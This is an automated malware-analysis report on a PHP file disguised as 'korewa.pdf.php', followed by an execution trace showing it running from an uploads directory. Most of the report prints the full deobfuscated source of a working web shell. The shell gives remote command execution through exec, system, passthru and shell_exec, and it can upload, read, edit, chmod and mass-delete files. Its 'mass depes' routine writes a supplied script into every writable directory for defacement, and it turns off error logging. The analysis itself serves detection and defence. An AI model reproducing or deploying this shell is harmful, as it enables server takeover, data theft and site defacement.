PHP Malware Analysis
korewa.pdf.php
md5: 43cf88630ea069b39314adef225c2c80
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- unknownsec1337@gmail.com (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- exec (Deobfuscated, Original)
- passthru (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
- system (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- " . $_SERVER['HTTP_HOST'] . " - {$▛} 403 (Deobfuscated)
- ".$_SERVER['HTTP_HOST']." - $▛ 403 (Original)
- localhost - UnknownSec 403 (HTML)
Deobfuscated PHP code
<?php
/* ~ Gw doain kalo lu recode tytyd lu jadi kecil
~ v.02
~ special thanks to Michy Amrane
~ untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
echo file_get_contents($_POST['path']);
exit;
}
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function ▟_2($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
} else {
return "[ <font color='red'>This directory is unreadable</font> ]";
}
}
function dc($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function ip()
{
$ipas = '';
if (getenv('HTTP_CLIENT_IP')) {
$ipas = getenv('HTTP_CLIENT_IP');
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$ipas = getenv('HTTP_X_FORWARDED_FOR');
} else {
if (getenv('HTTP_X_FORWARDED')) {
$ipas = getenv('HTTP_X_FORWARDED');
} else {
if (getenv('HTTP_FORWARDED_FOR')) {
$ipas = getenv('HTTP_FORWARDED_FOR');
} else {
if (getenv('HTTP_FORWARDED')) {
$ipas = getenv('HTTP_FORWARDED');
} else {
if (getenv('REMOTE_ADDR')) {
$ipas = getenv('REMOTE_ADDR');
} else {
$ipas = 'IP tidak dikenali';
}
}
}
}
}
}
return $ipas;
}
function x($cmd)
{
$▙ = '';
if (function_exists('exec')) {
@exec($cmd, $▙);
$▙ = @join("\n", $▙);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($cmd);
$▙ = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($cmd);
$▙ = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$▙ = shell_exec($cmd);
} else {
return "\xe2\x86\xb3 Unable to execute command\n";
}
return $▙ == '' ? "\xe2\x86\xb3 Query did not return anything\n" : $▙;
}
function p($file)
{
$p = fileperms($file);
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
echo "\n<!DOCTYPE HTML>\n<html>\n\t<head>\n\t\t<meta name='author' content='{$▛}'>\n\t\t<meta name='robots' content='NOINDEX, NOFOLLOW'>\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$▛} 403</title>\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.60, user-scalable=no'>\n\t\t<link rel='stylesheet' href='//unknownsec1337.github.io/main/style.css' type='text/css'>\n\t</head>\n<body>\n<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\n<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>\n\t<div class='card text-dark'>\n\t\t<div class='card-header'>\n\t\t\t<a href='?'><h4>{$▛} Bypass <i class='fas fa-biohazard'></i> 403</h4></a>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<i class=\"fab fa-gitter\"></i> : <a href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo " [ " . ▟($path, p($path)) . " ]";
echo "\n\t\t\t<div class='dropdown'>\n\t\t\t\t<button class='btn btn-dark dropdown-toggle' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='fas fa-server'></i> Menu</button>\n\t\t\t<div class='dropdown-menu'>\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=upload'><i class='fas fa-upload'></i> Upload</a>\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=depes'><i class='fas fa-theater-masks'></i> Mass depes</a>\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=delete'><i class='far fa-trash-alt'></i> Mass delete</a>\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=cmd'><i class='fas fa-terminal'></i> Terminal</a>\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=info'><i class='fas fa-info-circle'></i> Info server</a>\n\t\t\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=about'><i class='fas fa-info'></i> About</a></h5>\n\t\t\t</div>\n\t\t</div>\n\t</div>\n</div>";
// tools nya
if (isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if ($i != $c_dir) {
} elseif ($_GET['id'] == 'depes') {
function mass_kabeh($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$▚}<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$dirb}/{$namafile}<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif ($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />{$▘}\n<form method='post'>\n\t<b>Tipe:</b><br>\n<div class='custom-control custom-switch'>\n\t<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>\n\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\n</div>\n<div class='custom-control custom-switch'>\n\t<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>\n\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\n</div>\n\t<b><i class='far fa-folder'></i> Lokasi:</b>\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\n\t<b><i class='far fa-file-alt'></i> File name:</b>\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>\n\t<b><i class='far fa-file-alt'></i> Your script:</b>\n\t<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />\n\t<input type='submit' name='start' value='Go' class='btn btn-primary btn-block'>\n</form>";
}
} elseif ($_GET['id'] == 'info') {
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>{$disfunc}</font>";
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>" . php_uname() . "</font><br />";
echo "<b>Software: </b><font color=green>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br />";
echo "<b>PHP version: </b><font color=green>PHP_VERSION</font> <b>PHP os:</b> <font color=green>PHP_OS</font><br />";
echo "<b>Server Ip: </b><font color=green>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font><br />";
echo "<b>Your Ip: </b><font color=green>" . ip() . "</font><br />";
echo "<b>User: </b><font color=green>{$user}</font> ({$uid}) | <b>Group:</b> <font color=green>{$group}</font> ({$gid})<br />";
echo "<b>Safe Mode: </b>{$sm}<br />";
echo "<kbd>Disable Function:</kbd><pre>{$disfc}</pre>";
echo "</div>\n\t</div>\n</div>";
} elseif ($_GET['id'] == 'about') {
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img class='img-thumbnail rounded mx-auto d-block' src='//unknownsec1337.github.io/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo "</div>\n\t</div>\n</div>";
} elseif ($_GET['id'] == 'cmd') {
echo "<br />{$▘}\n<form method='post'>\n\t<div class='input-group mb-3'>\n\t\t<input type='text' class='form-control' name='cmd' placeholder='ls -la | id | uname -a'>\n\t<div class='input-group-append'>\n\t\t<input class='btn btn-primary' type='submit' name='id_cmd' value='Go'>\n\t</form>\n\t</div>\n</div>";
if ($_POST['id_cmd']) {
$cmd = $_POST['cmd'];
echo "\n<div class='container'>\n\t<div class='card text-dark'>\n\t\t<div class='card-header'>\n\t\t\t<kbd><b>~\$</b> {$cmd}</kbd><pre>" . x($_POST['cmd']) . "</pre>\n\t\t</div>\n\t</div>\n</div>\n";
}
} elseif ($_GET['id'] == 'upload') {
echo '<br />' . $▘ . '
<form method="post" enctype="multipart/form-data">
<div class="input-group mb-3">
<div class="custom-file">
<label class="custom-file-label" for="inputGroupFile04">
<input class="custom-file-input" id="inputGroupFile04" type="file" name="file" onchange="this.form.submit()" multiple>
</label>
</div>
</div>
</form>';
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
} elseif ($_GET['id'] == 'delete') {
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
if (file_exists("{$dir}/{$namafile}")) {
unlink("{$dir}/{$namafile}");
}
} elseif ($dirb === '..') {
if (file_exists("" . dirname($dir) . "/{$namafile}")) {
unlink("" . dirname($dir) . "/{$namafile}");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if (file_exists($▚)) {
echo "[<font color=green>deleted</font>] {$▚}<br>";
unlink($▚);
$▟ = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />{$▘}\n<form method='post'>\n\t<b><i class='far fa-folder'></i> Lokasi:</b>\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\n\t<b><i class='far fa-file-alt'></i> File name:</b>\n\t<div class='input-group mb-3'>\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>\n\t<div class='input-group-append'>\n\t<input class='btn btn-primary btn-block' type='submit' name='start' value='Go'>\n</form>\n\t</div>\n\t</div>";
}
}
}
// akhir tools
if (isset($_GET['filesrc'])) {
echo "<tr><td><center><br><b>files : </b>";
echo $_GET['filesrc'];
echo "</center></tr></td></table></br>";
echo '<textarea class="form-control" rows="7" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea><br />';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
//Chmod
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
echo '<form method="POST">
<b>Permission :</b>
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '"/>
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_GET['opt'] == 'btw') {
$cwd = getcwd();
echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
<b>New Name :</b>
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="' . $cwd . '">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<b>New Name :</b>
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="' . $_POST['name'] . '" />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-primary btn-block" type="submit" value="Go"/>
</form><br />';
}
echo "</center>";
} else {
echo "</table><br /><center>";
//delete dir
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
}
echo "</center>";
$scandir = scandir($path);
$pa = getcwd();
echo "<div class=\"container-fluid\"><table class=\"table table-striped table-bordered table-hover bg-white\" cellspacing=\"0\" cellpadding=\"7\" width=\"100%\">\n<tr>\n\t<th class=\"text-center bg-dark text-white\">Name</th>\n\t\t<th class=\"text-center bg-dark text-white\">Last edit</th>\n\t\t<th class=\"text-center bg-dark text-white\">Size</th>\n\t\t<th class=\"text-center bg-dark text-white\">Permission</th>\n\t<th class=\"text-center bg-dark text-white\">Options</th>\n</tr>\n</tr>\n<tr>";
foreach ($scandir as $dir) {
$dtime = date("Y-m-d g:i:s", filemtime("{$path}/{$dir}"));
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "\n\t<tr>\n\t<td><img class='ico' src='//unknownsec1337.github.io/icon/folder.png'><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\n\t<td><center>{$dtime}</center></td>\n\t<td><center>DIR</center></td>\n\t<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\n<td>\n<form method=\"POST\" action=\"?option&path={$path}\">\n<div class='input-group mb-3 text-center'>\n\t<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">\n\t\t<option selected disabled>Select</option>\n\t\t<option value=\"delete\">Delete</option>\n\t\t<option value=\"chmod\">Chmod</option>\n\t\t<option value=\"rename\">Rename</option>\n\t</select>\n<input type=\"hidden\" name=\"type\" value=\"dir\">\n\t<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n\t\t\t<div class='input-group-append'>\n\t\t\t<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>\n\t\t</form>\n\t</div>\n</div>\n</td>\n</tr>";
}
foreach ($scandir as $file) {
$ftime = date("Y-m-d g:i:s", filemtime("{$path}/{$file}"));
if (!is_file($path . '/' . $file)) {
continue;
}
$size = filesize($path . '/' . $file) / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "\n<tr>\n\t<td><img src=\"";
$▖ = strtolower(pathinfo($file, PATHINFO_EXTENSION));
if ($▖ == "htaccess") {
echo "//unknownsec1337.github.io/icon/htaccess.png";
} elseif ($▖ == "png" || $▖ == "jpg" || $▖ == "jpeg" || $▖ == "gif" || $▖ == "ico") {
echo "//unknownsec1337.github.io/icon/images.png";
} elseif ($▖ == "php") {
echo "//unknownsec1337.github.io/icon/php.png";
} elseif ($▖ == "ini") {
echo "//unknownsec1337.github.io/icon/ini.png";
} elseif ($▖ == "html") {
echo "//unknownsec1337.github.io/icon/html.png";
} elseif ($▖ == "js") {
echo "//unknownsec1337.github.io/icon/js.png";
} elseif ($▖ == "css") {
echo "//unknownsec1337.github.io/icon/css.png";
} elseif ($▖ == "json") {
echo "//unknownsec1337.github.io/icon/json.png";
} elseif ($▖ == "txt") {
echo "//unknownsec1337.github.io/icon/txt.png";
} elseif ($▖ == "sql") {
echo "//unknownsec1337.github.io/icon/sql.png";
} elseif ($▖ == "py") {
echo "//unknownsec1337.github.io/icon/py.png";
} elseif ($▖ == "pl") {
echo "//unknownsec1337.github.io/icon/pl.png";
} elseif ($▖ == "dat") {
echo "//unknownsec1337.github.io/icon/dat.png";
} elseif ($▖ == "md") {
echo "//unknownsec1337.github.io/icon/md.png";
} elseif ($▖ == "sh") {
echo "//unknownsec1337.github.io/icon/sh.png";
} elseif ($▖ == "zip") {
echo "//unknownsec1337.github.io/icon/zip.png";
} elseif ($▖ == "rar") {
echo "//unknownsec1337.github.io/icon/rar.png";
} elseif ($▖ == "xls") {
echo "//unknownsec1337.github.io/icon/xls.png";
} elseif ($▖ == "excel") {
echo "//unknownsec1337.github.io/icon/excel.png";
} elseif ($▖ == "word") {
echo "//unknownsec1337.github.io/icon/word.png";
} elseif ($▖ == "doc") {
echo "//unknownsec1337.github.io/icon/doc.png";
} elseif ($▖ == "mp4") {
echo "//unknownsec1337.github.io/icon/mp4.png";
} elseif ($▖ == "mp3") {
echo "//unknownsec1337.github.io/icon/mp3.png";
} elseif ($▖ == "pdf") {
echo "//unknownsec1337.github.io/icon/pdf.png";
} elseif ($▖ == "csv") {
echo "//unknownsec1337.github.io/icon/csv.png";
} else {
echo "//unknownsec1337.github.io/icon/dflt.png";
}
echo "\" class=\"ico\">";
echo "<a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\n\t<td><center>{$ftime}</center></td>\n\t<td><center>{$size}</center></td>\n\t<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\n\t<td>\n<form method=\"POST\" action=\"?option&path={$path}\">\n<div class='input-group mb-3 text-center'>\n<select class=\"form-control\" style=\"width: 40%;\" name=\"opt\">\n\t<option selected disabled>Select</option>\n\t\t<option value=\"delete\">Delete</option>\n\t\t<option value=\"edit\">Edit</option>\n\t\t<option value=\"rename\">Rename</option>\n\t\t<option value=\"chmod\">Chmod</option>\n\t<option value=\"download\">Download</option>\n</select>\n\t<input type=\"hidden\" name=\"type\" value=\"file\">\n\t\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n\t\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n\t\t<div class='input-group-append'>\n\t\t\t<input class=\"btn btn-primary btn-block\" type=\"submit\" value=\"Go\"/>\n\t\t</form>\n\t</div>\n</div>\n</td>\n</tr>";
}
}
echo "\n</table>\n<div class='card text-dark'>\n\t<div class='card-header text-center'>\n\t\t<kbd>Copyright © " . date("Y") . " - <a href=''>{$▛}</a></kbd>\n\t\t<br>" . ▟_2($path, p($path)) . "\n\t</div>\n</div>\n<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\n<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>\n<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\n</body>\n</html>";Execution traces
data/traces/43cf88630ea069b39314adef225c2c80_trace-1676261907.0146.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:18:52.912389]
1 0 1 0.000185 393528
1 3 0 0.000845 533440 {main} 1 /var/www/html/uploads/korewa.pdf.php 0 0
2 4 0 0.000864 533440 set_time_limit 0 /var/www/html/uploads/korewa.pdf.php 7 1 0
2 4 1 0.000882 533504
2 4 R FALSE
2 5 0 0.000896 533472 error_reporting 0 /var/www/html/uploads/korewa.pdf.php 8 1 0
2 5 1 0.000910 533512
2 5 R 22527
2 6 0 0.000923 533472 ini_set 0 /var/www/html/uploads/korewa.pdf.php 9 2 'error_log' NULL
2 6 1 0.000939 533544
2 6 R ''
2 7 0 0.000952 533472 ini_set 0 /var/www/html/uploads/korewa.pdf.php 10 2 'log_errors' 0
2 7 1 0.000967 533544
2 7 R '1'
2 8 0 0.000980 533472 ini_set 0 /var/www/html/uploads/korewa.pdf.php 11 2 'max_execution_time' 0
2 8 1 0.000994 533512
2 8 R '0'
2 9 0 0.001006 533440 ini_set 0 /var/www/html/uploads/korewa.pdf.php 12 2 'output_buffering' 0
2 9 1 0.001020 533512
2 9 R FALSE
2 10 0 0.001033 533440 ini_set 0 /var/www/html/uploads/korewa.pdf.php 13 2 'display_errors' 0
2 10 1 0.001047 533512
2 10 R ''
1 A /var/www/html/uploads/korewa.pdf.php 14 $▛ = 'UnknownSec'
1 A /var/www/html/uploads/korewa.pdf.php 15 $▘ = '<style>table{display:none;}</style>'
2 11 0 0.001086 533440 get_magic_quotes_gpc 0 /var/www/html/uploads/korewa.pdf.php 22 0
2 11 1 0.001099 533440
2 11 R FALSE
2 12 0 0.001115 533440 getcwd 0 /var/www/html/uploads/korewa.pdf.php 154 0
2 12 1 0.001128 533488
2 12 R '/var/www/html/uploads'
1 A /var/www/html/uploads/korewa.pdf.php 154 $path = '/var/www/html/uploads'
2 13 0 0.001154 533488 str_replace 0 /var/www/html/uploads/korewa.pdf.php 156 3 '\\' '/' '/var/www/html/uploads'
2 13 1 0.001169 533584
2 13 R '/var/www/html/uploads'
1 A /var/www/html/uploads/korewa.pdf.php 156 $path = '/var/www/html/uploads'
2 14 0 0.001194 533488 explode 0 /var/www/html/uploads/korewa.pdf.php 157 2 '/' '/var/www/html/uploads'
2 14 1 0.001208 534064
2 14 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/korewa.pdf.php 157 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/korewa.pdf.php 158 $id = 0
1 A /var/www/html/uploads/korewa.pdf.php 160 $a = TRUE
1 A /var/www/html/uploads/korewa.pdf.php 158 $id = 1
1 A /var/www/html/uploads/korewa.pdf.php 166 $i = 0
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 158 $id = 2
1 A /var/www/html/uploads/korewa.pdf.php 166 $i = 0
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 158 $id = 3
1 A /var/www/html/uploads/korewa.pdf.php 166 $i = 0
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 158 $id = 4
1 A /var/www/html/uploads/korewa.pdf.php 166 $i = 0
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
